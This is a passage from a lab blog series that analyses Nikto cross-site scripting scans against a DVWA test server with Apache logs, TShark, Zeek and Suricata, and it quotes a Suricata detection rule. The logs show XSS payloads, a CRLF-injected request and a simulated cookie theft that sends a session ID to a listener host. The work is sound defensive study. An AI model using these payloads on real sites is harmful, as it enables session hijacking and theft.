<span style="color: white;">└─$ curl --request GET http://10.0.0.106//dvwa/index.php?</span><span style="color: #fcff01;">NonExistentShit=FalseFlags</span><span style="color: white;"> --remote-name --silent</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>This produced:</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">10.0.0.107 - - [05/Jun/2023:14:09:44 -0400] "GET //dvwa/index.php?</span><span style="color: #fcff01;">NonExistentShit=FalseFlags</span><span style="color: white;"> HTTP/1.1" </span><span style="color: #fcff01;">200</span><span style="color: white;"> 5960 "-" "curl/7.88.1"</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>At this point, I'm going to conclude the <i>200</i> was returned for the page and not the parameter.</p><p>Peeking at the first few lines of the <i>error.log</i> file, looking for which attempt was made to run the script on.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ cat error.log | grep "10.0.0.108" | grep --perl-regexp "\s+script.*" | head --lines=5 </span>
<span style="color: white;">[Fri Jun 02 13:37:21.898886 2023] [cgi:error] [pid 7548:tid 1864] [client 10.0.0.108:55840] AH02811: script not found or unable to stat: C:/xampp/htdocs/dvwa/cgi.cgi</span>
<span style="color: white;">[Fri Jun 02 13:37:23.506008 2023] [cgi:error] [pid 7548:tid 1864] [client 10.0.0.108:55874] AH02811: script not found or unable to stat: C:/xampp/htdocs/dvwa/index.asp</span>
<span style="color: white;">[Fri Jun 02 13:37:23.506008 2023] [cgi:error] [pid 7548:tid 1864] [client 10.0.0.108:55874] AH02811: script not found or unable to stat: C:/xampp/htdocs/dvwa/junk999.asp</span>
<span style="color: white;">[Fri Jun 02 13:37:23.522563 2023] [cgi:error] [pid 7548:tid 1864] [client 10.0.0.108:55874] AH02811: script not found or unable to stat: C:/xampp/htdocs/dvwa/login.asp</span>
<span style="color: white;">[Fri Jun 02 13:37:23.637381 2023] [cgi:error] [pid 7548:tid 1864] [client 10.0.0.108:47494] AH02811: script not found or unable to stat: C:/xampp/htdocs/dvwa/index.cgi</span>
<span style="color: white;">...</span>
</pre></div>
</div><div><br /></div><div><div>Above shows "<i>script not found</i>". How many of those "<i>script not found</i>" do we have?</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ cat error.log | grep "10.0.0.108" | grep --perl-regexp "\s+script.*" --only-matching | sort --unique | cut --fields=2 --delimiter='C' | cut --fields=1 --delimiter="'" | cut --fields=1 --delimiter=',' | sort --unique | wc --lines</span>
<span style="color: white;">93</span>
</pre></div>
</div><div><br /></div><div>With 93 files accessed, was any "found"? Invert the "<i>grep</i>".</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ cat error.log | grep "10.0.0.108" | grep --perl-regexp "\s+script.*" --invert-match | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">grep --perl-regexp "Cannot\s+map|s+GET"</span>
<span style="color: white;">[Fri Jun 02 13:37:24.113277 2023] [core:error] [pid 7548:tid 1864] (20024)The given path is misformatted or contained invalid characters: [client 10.0.0.108:47510] AH00127: Cannot map GET /%20HTTP/1.1%0d%0aAccept%3a%20RIxToXpAUn2JvPd87/../../dvwa/666%0a%0a<script>alert('Vulnerable');</script>666.jsp HTTP/1.1 to file</span>
<span style="color: white;">...</span>
</pre></div>
</div><div><br /></div><div><div>Removing those cannot map messages.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ cat error.log | grep "10.0.0.108" | grep --perl-regexp "\s+script.*" --invert-match | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">grep --perl-regexp "Cannot\s+map|s+GET" --invert-match </span>
<span style="color: white;">[Fri Jun 02 13:37:23.522563 2023] [php:warn] [pid 7548:tid 1864] [client 10.0.0.108:55874] PHP Warning: Undefined array key "HTTP_HOST" in C:\\xampp\\htdocs\\dvwa\\dvwa\\includes\\dvwaPage.inc.php on line 45</span>
<span style="color: white;">...</span>
</pre></div>
</div><div><br /></div><div><div>At this point, I have not seen anything in the <i>error.log</i> that suggest this attack was successful. We know we can see lots of "<i><script>alert('Vulnerable')</script></i>" which definitely suggest we should be concerned about the source IP involved with this activity. However, we have to work with the evidence we currently have and not what we want.</div><div><br /></div><div>To see more on log analysis for Cross Site scripting: <a href="https://www.securitynik.com/2017/02/beginning-web-application-testing.html">Learning by practicing: Beginning Web Application Testing: Detecting Cross Site Scripting (XSS)–DVWA (securitynik.com)</a></div></div><div><br /></div><div><div><b><span style="font-size: medium;"><br /></span></b></div><div><b><span style="font-size: medium;">Detect - Packet Analysis</span></b></div></div><div><br /></div><div><div>Setup for packet analysis. Capture packets on ports 80,443</div></div><div><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ tshark -n -w tuning_1.pcap -f 'tcp port(80 or 443)' --interface eth0</span>
</pre></div>
</div><div><br /></div><div>What did we get from the capture.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ tshark -n -r tuning_4.pcap -Y 'http.response.code == 200' -T fields -e tcp.stream| sort --unique </span>
<span style="color: white;">0</span>
<span style="color: white;">10</span>
<span style="color: white;">11</span>
<span style="color: white;">12</span>
<span style="color: white;">13</span>
<span style="color: white;">4</span>
<span style="color: white;">5</span>
<span style="color: white;">6</span>
<span style="color: white;">7</span>
<span style="color: white;">8</span>
<span style="color: white;">9</span>
</pre></div>
</div><div><br /></div><div>Looking at stream <i>0</i> with the query below, did not produce any results I found meaningful.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ tshark -n -r tuning_4.pcap -q -z follow,tcp,ascii,4 | grep --perl-regexp "\s+200|s+OK" --before-context=7 --after-context=11</span>
</pre></div>
</div><div><br /></div><div>This stream did not produce the resulted that I expected. As a result, I decided to simulate stealing the cookie via cross scripting from a different perspective. When I looked at the packet capture, I see the cookie is sent via the <i>GET</i> request.</div><div><br /></div><div><span style="color: white;"><!--HTML generated using hilite.me--></span><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span><span style="color: white;">
</span><span style="color: white;">└─$ tshark -n -r xss.pcap -q -z follow,tcp,ascii,1 | sed '1,7d' | sed '$d' </span><span style="color: white;">
</span><span style="color: white; font-weight: bold;">GET</span><span style="color: white;"> </span><span><span style="color: white;">/steal.txt?</span><span style="color: #fcff01;">security=low;%20PHPSESSID=c9nho1bvu73dg6baehjo2vjgcn</span></span><span style="color: white;"> </span><span style="color: white; font-weight: bold;">HTTP</span><span style="color: white;">/</span><span style="color: white; font-weight: bold;">1.1</span><span style="color: white;">
</span><span style="color: white; font-weight: bold;">Host</span><span style="color: white;">:</span><span style="color: white;"> </span><span style="color: white;">10.0.0.107:9999</span><span style="color: white;">
</span><span style="color: white; font-weight: bold;">Connection</span><span style="color: white;">:</span><span style="color: white;"> </span><span style="color: white;">keep-alive</span><span style="color: white;">
</span><span style="color: white; font-weight: bold;">Upgrade-Insecure-Requests</span><span style="color: white;">:</span><span style="color: white;"> </span><span style="color: white;">1</span><span style="color: white;">
</span><span style="color: white; font-weight: bold;">User-Agent</span><span style="color: white;">:</span><span style="color: white;"> </span><span style="color: white;">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36 Edg/101.0.1210.32</span><span style="color: white;">
</span><span style="color: white; font-weight: bold;">Accept</span><span style="color: white;">:</span><span style="color: white;"> </span><span style="color: white;">text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9</span><span style="color: white;">
</span><span style="color: white; font-weight: bold;">Referer</span><span style="color: white;">:</span><span style="color: white;"> </span><span style="color: white;">http://10.0.0.106/</span><span style="color: white;">
</span><span style="color: white; font-weight: bold;">Accept-Encoding</span><span style="color: white;">:</span><span style="color: white;"> </span><span style="color: white;">gzip, deflate</span><span style="color: white;">
</span><span style="color: white; font-weight: bold;">Accept-Language</span><span style="color: white;">:</span><span style="color: white;"> </span><span style="color: white;">en-US,en;q=0.9</span></span>
</pre></div>
</div><div><br /></div><div>Wrapping this up. In my opinion, the cookie which was returned was not a cookie that was stolen but instead the cookie which was part of the Nikto session.</div><div><br /></div><div><span style="color: white;"><!--HTML generated using hilite.me--></span><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span>└─$ strings tuning_4.pcap | grep "3a%209dezoCMqi7" --after-context=10</span>
<span style="font-weight: bold;">GET</span> <span>/%20HTTP/1.1%0d%0aAccept%3a%209dezoCMqi7/../../dvwa/</span> <span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.1</span>
<span style="font-weight: bold;">Host</span><span>:</span> <span>10.0.0.106</span>
<span style="font-weight: bold;">Connection</span><span>:</span> <span>Keep-Alive</span>
<span style="font-weight: bold;">User-Agent</span><span>:</span> <span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</span>
<span>HTTP/1.1</span> <span>200 OK</span>
<span style="font-weight: bold;">Date</span><span>:</span> <span>Fri, 02 Jun 2023 17:37:21 GMT</span>
<span style="font-weight: bold;">Server</span><span>:</span> <span>Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28</span>
<span style="font-weight: bold;">X-Powered-By</span><span>:</span> <span>PHP/8.0.28</span>
<span style="font-weight: bold;">Set-Cookie</span><span>:</span> <span>security=low; path=/</span>
<span style="font-weight: bold;">Set-Cookie</span><span>:</span> <span>PHPSESSID=6d25e0unoqrfr1822r98chsjr3; expires=Sat, 03-Jun-2023 17:37:21 GMT; Max-Age=86400; path=/</span>
<span style="font-weight: bold;">Expires</span><span>:</span> <span>Tue, 23 Jun 2009 12:00:00 GMT</span></span>
</pre></div>
</div><div><br /></div><div><div>Moving on now.</div></div><div><br /></div><div><div><b><span style="font-size: medium;">Detect - Zeek Analysis</span></b></div></div><div><br /></div><div>Setup Zeek<br /><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/zeek_stuff]</span>
<span style="color: white;">└─$ sudo zeek --iface any --no-checksums</span>
</pre></div>
</div><div><br /></div><div>Looking at the <i>analyzer.log</i> file</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ cat analyzer.log </span>
<span style="color: white;">...</span>
<span style="color: white;">#open 2023-06-02-13-37-45</span>
<span style="color: white;">#fields ts cause analyzer_kind analyzer_name uid fuid id.orig_h id.orig_p id.resp_h id.resp_p failure_reason failure_data</span>
<span style="color: white;">#types time string string string string string addr port addr port string string</span>
<span style="color: white;">1685727465.687074 violation protocol HTTP CvBOhB3P4vU8YucCt6 - 10.0.0.108 47542 10.0.0.106 80 not a http request line -</span>
<span style="color: white;">#close 2023-06-02-13-37-53</span>
</pre></div>
</div><div><br /></div><div><div>Above shows traffic between two hosts occurring on port 80, typically HTTP, but we see "<i>failure_reason</i>" as "<i>not a http request line</i>".</div><div><br /></div><div>Looking at UID <i>"CvBOhB3P4vU8YucCt6</i>" to find which other logs this UID is seen in.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ grep "CvBOhB3P4vU8YucCt6" *.log | cut --fields=1 --delimiter=":" | sort --unique </span>
<span style="color: white;">analyzer.log</span>
<span style="color: white;">conn.log</span>
<span style="color: white;">dpd.log</span>
<span style="color: white;">files.log</span>
<span style="color: white;">http.log</span>
<span style="color: white;">weird.log</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the <i>weird.log</i></div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ cat weird.log </span>
<span style="color: white;">#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p name addl notice peer source</span>
<span style="color: white;">1685727464.327551 CdCvW413cTsQUyb9lf 10.0.0.108 55874 10.0.0.106 80 HTTP_version_mismatch - F zeek HTTP</span>
<span style="color: white;">1685727464.641628 CZCM3y1MlJGfr3DZ27 10.0.0.108 47496 10.0.0.106 80 unknown_HTTP_method XULKCYAP F zeek -</span>
<span style="color: white;">1685727464.659445 CcdKGV3GMXMm4z9kI4 10.0.0.108 47504 10.0.0.106 80 unknown_HTTP_method TRACK F zeek -</span>
<span style="color: white;">1685727464.664164 CcdKGV3GMXMm4z9kI4 10.0.0.108 47504 10.0.0.106 80 HTTP_version_mismatch - F zeek HTTP</span>
<span style="color: white;">1685727464.950085 C4Ed651QVcleVPgo29 10.0.0.108 47520 10.0.0.106 80 unescaped_%_in_URI - F zeek HTTP</span>
<span style="color: white;">1685727465.454423 CmYMGa2Q3SpVd9r26d 10.0.0.108 47532 10.0.0.106 80 unescaped_%_in_URI - F zeek HTTP</span>
<span style="color: white;">1685727465.687074 CvBOhB3P4vU8YucCt6 10.0.0.108 47542 10.0.0.106 80 bad_HTTP_request_with_version - F zeek HTTP</span>
</pre></div>
</div><div><br /></div><div>While other lines are interesting and helpful, especially seeing unknown methods, the one that I will focus on is the last line. This was seen in the <i>analyzer.log</i> and we see this is "<i>bad_HTTP_request_with_version</i>"</div><p>Looking at the last 5 entries in the <i>http.log</i>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ grep "CvBOhB3P4vU8YucCt6" http.log | grep --perl-regexp "/dvwa.*.?>" --only-matching | sort --unique | tail --lines=5</span>
<span style="color: white;">/dvwa/webtools/bonsai/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script></span>
<span style="color: white;">/dvwa/webtools/bonsai/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script></span>
<span style="color: white;">/dvwa/webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script></span>
<span style="color: white;">/dvwa/webtools/bonsai/showcheckins.cgi?person=<script>alert('Vulnerable')</script></span>
<span style="color: white;">/dvwa/XJjRNFyhnLKaf4qbov1ToCeQUomdYA2Vj5S8TQBAEPOiEsXu4umBXddFMlvLzvZm6sPqllgtuX6TeLlDSSwVmLb490LxkJgeX2NnGsvgESafjKPUIHOYLmSAz5NFPDOc1qhQPE8ZSC26h12u9d1a987Zqbik1erQMssHWPByVRRo6zKaA9cp5A7SAijWurFZWxhXOp38ChVSiuQULsVXLS7wZCWWlVZ<font size=50><script>alert(11)</script></span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Above all shows, this was a cross site scripting attack, against a few different parameters. The question obviously, is whether this was successful. Everything in the analysis so far suggest it was not.</p><p>Moving on to see what the IPS saw throughout this attack.</p><p><b><span style="font-size: medium;">Detect - Suricata (IDS) Analysis</span></b></p><p>Setup Suricata to operate in IDS mode</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/var/log/suricata]</span>
<span style="color: white;">└─$ sudo suricata -c /etc/suricata/suricata.yaml -s /var/lib/suricata/rules/suricata.rules -i eth0 -l . --simulate-ips -k all</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Looking at the alerts that triggered.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ cat fast.log | cut --fields=3 --delimiter='[' | sort | uniq --count | sort --numeric-sort --reverse | head --lines=5 </span>
<span style="color: white;"> 265 1:2009714:8] ET WEB_SERVER Script tag in URI Possible Cross Site Scripting Attempt </span>
<span style="color: white;"> 39 1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt </span>
<span style="color: white;"> 19 1:2101201:11] GPL WEB_SERVER 403 Forbidden </span>
<span style="color: white;"> 9 1:2021005:3] ET WEB_SPECIFIC_APPS Vulnerable Magento Adminhtml Access </span>
<span style="color: white;"> 4 1:2019526:5] ET WEB_SERVER WEB-PHP phpinfo access </span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Above shows the majority of them were associated with 1 rule "<i>1:2009714:8</i>". This is what I expected to see as the activity performed above was cross site scripting. What is that rule looking for.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ grep "2009714" /var/lib/suricata/rules/suricata.rules </span>
<span style="color: white;">alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Script tag in URI Possible Cross Site Scripting Attempt"; flow:to_server,established; http.uri; content:"</script>"; nocase; reference:url,ha.ckers.org/xss.html; reference:url,doc.emergingthreats.net/2009714; classtype:web-application-attack; sid:2009714; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, former_category WEB_SERVER, signature_severity Major, tag XSS, tag Cross_Site_Scripting, updated_at 2020_08_20;)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Above shows the rule is basically looking for <i>"</script>"</i> in the URI. Looking into the packet where <i>"</script>"</i> was seen in the URI.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span><span><span style="color: white;">
</span><span style="color: white;">└─$ less alert-debug.log </span><span style="color: white;">
</span><span style="color: white;">...</span><span style="color: white;">
</span><span style="color: white;">ALERT CNT: 1</span><span style="color: white;">
</span><span style="color: white;">ALERT MSG [00]: ET WEB_SERVER Script tag in URI Possible Cross Site Scripting Attempt</span><span style="color: white;">
</span><span style="color: white;">ALERT GID [00]: 1</span><span style="color: white;">
</span><span style="color: white;">ALERT SID [00]: 2009714</span><span style="color: white;">
</span><span style="color: white;">ALERT REV [00]: 8</span><span style="color: white;">
</span><span style="color: white;">ALERT CLASS [00]: Web Application Attack</span><span style="color: white;">
</span><span style="color: white;">ALERT PRIO [00]: 1</span><span style="color: white;">
</span><span style="color: white;">ALERT FOUND IN [00]: STATE</span><span style="color: white;">
</span><span style="color: white;">ALERT IN TX [00]: 27</span><span style="color: white;">
</span><span style="color: white;">PAYLOAD LEN: 341</span><span style="color: white;">
</span><span style="color: white;">PAYLOAD:</span><span style="color: white;">
</span><span style="color: white;"> 0000 47 45 54 20 2F 25 32 30 48 54 54 50 2F 31 2E 31 </span><span style="color: white; font-weight: bold;">GET</span><span style="color: white;"> </span><span style="color: white;">/%20</span><span style="color: white;"> </span><span style="color: white; font-weight: bold;">HTTP</span><span style="color: white;">/</span><span style="color: white; font-weight: bold;">1.1</span><span style="color: white;">
</span><span style="color: white;">0010 25 30 64 25 30 61 41 63 63 65 70 74 25 33 61 25 %0d%0aAc cept%3a%</span><span style="color: white;">
</span><span style="color: white;">0020 32 30 73 7A 51 72 5A 76 56 6F 66 6D 47 57 4D 2F 20szQrZv VofmGWM/</span><span style="color: white;">
</span><span style="color: white;">0030 2E 2E 2F 2E 2E 2F 64 76 77 61 2F 74 68 65 6D 65 ../../dv wa/theme</span><span style="color: white;">
</span><span style="color: white;">0040 73 2F 6D 61 6D 62 6F 73 69 6D 70 6C 65 2E 70 68 s/mambos imple.ph</span><span style="color: white;">
</span><span style="color: white;">0050 70 3F 64 65 74 65 63 74 69 6F 6E 3D 64 65 74 65 p?detect ion=dete</span><span style="color: white;">
</span><span style="color: white;">0060 63 74 65 64 26 73 69 74 65 6E 61 6D 65 3D 3C 2F cted&sit ename=</</span><span style="color: white;">
</span><span style="color: white;">0070 74 69 74 6C 65 3E 3C 73 63 72 69 70 74 3E 61 6C title><s cript>al</span><span style="color: white;">
</span><span style="color: white;">0080 65 72 74 28 64 6F 63 75 6D 65 6E 74 2E 63 6F 6F ert(docu ment.coo</span><span style="color: white;">
</span><span><span style="color: white;">0090 6B 69 65 29 3C 2F 73 63 72 69 70 74 3E 20 48 54 kie)</span><span style="color: #fcff01;"></sc ript></span><span style="color: white;"> HT</span></span><span style="color: white;">
</span><span style="color: white;">00A0 54 50 2F 31 2E 31 0D 0A 43 6F 6E 6E 65 63 74 69 TP/1.1.. Connecti</span><span style="color: white;">
</span><span style="color: white;">00B0 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 76 65 0D 0A on: Keep -Alive..</span><span style="color: white;">
</span><span style="color: white;">00C0 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 User-Age nt: Mozi</span><span style="color: white;">
</span><span style="color: white;">00D0 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 lla/5.0 (Windows</span><span style="color: white;">
</span><span style="color: white;">00E0 20 4E 54 20 31 30 2E 30 3B 20 57 69 6E 36 34 3B NT 10.0 ; Win64;</span><span style="color: white;">
</span><span style="color: white;">00F0 20 78 36 34 29 20 41 70 70 6C 65 57 65 62 4B 69 x64) Ap pleWebKi</span><span style="color: white;">
</span><span style="color: white;">0100 74 2F 35 33 37 2E 33 36 20 28 4B 48 54 4D 4C 2C t/537.36 (KHTML,</span><span style="color: white;">
</span><span style="color: white;">0110 20 6C 69 6B 65 20 47 65 63 6B 6F 29 20 43 68 72 like Ge cko) Chr</span><span style="color: white;">
</span><span style="color: white;">0120 6F 6D 65 2F 37 34 2E 30 2E 33 37 32 39 2E 31 36 ome/74.0 .3729.16</span><span style="color: white;">
</span><span style="color: white;">0130 39 20 53 61 66 61 72 69 2F 35 33 37 2E 33 36 0D 9 Safari /537.36.</span><span style="color: white;">
</span><span style="color: white;">0140 0A 48 6F 73 74 3A 20 31 30 2E 30 2E 30 2E 31 30 .Host: 1 0.0.0.10</span><span style="color: white;">
</span><span style="color: white;">0150 36 0D 0A 0D 0A 6....</span><span style="color: white;">
</span><span style="color: white;">...</span></span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Above shows the packet and what the rule matched on.</p><p>Nothing else interesting for me to focus on at this time.</p><div><b>Hope you enjoyed the posts in this series:</b></div><div><div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-scanning-for.html" target="_blank">Beginning Nikto - Scanning for interesting files seen in the logs</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-misconfiguration.html" target="_blank">Beginning Nikto - Misconfiguration / Default File - with evasion type 1 -> Random URI encoding (non-UTF8)</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Information Disclosure with evasion type 2 -> Directory self-reference (/./)</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Injection (XSS/Script/HTML) - with evasion type 3 -> Premature URL ending</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Remote File Retrieval with evasion type 4 -> Prepend long random string</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Command Execution / Remote Shell</a> </div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-sql-injection-with.html" target="_blank">Beginning Nikto - SQL Injection with default evasion</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-sql-injection-with.html" target="_blank">Beginning Nikto - File Upload Vulnerability testing</a></div></div><div><br /></div></div>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com0tag:blogger.com,1999:blog-7303400454979750101.post-40927179190356566182023-12-12T18:24:00.000-08:002023-12-12T18:45:49.008-08:00Beginning Nikto - Information Disclosure with evasion type 2 -> Directory self-reference (/./)<p>This post is part of the series of learning more about Nikto and web application scanning from the perspectives of both the <a href="https://www.amazon.com/Learning-Practicing-Leveraging-Practical-Detection/dp/1731254458" target="_blank">hack and its detection</a>. </p><p>From the hacking perspective, Nikto is the tool used. From detection perspective, the tools and or processed used for the network forensics are log analysis, TShark, Zeek and Suricata.<br /><br />Other posts in this series:<br /><br /></p><p><b><span style="font-size: medium;">Hack - Leveraging the information disclosure with evasion technique Directory self-reference (/./)</span></b></p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; 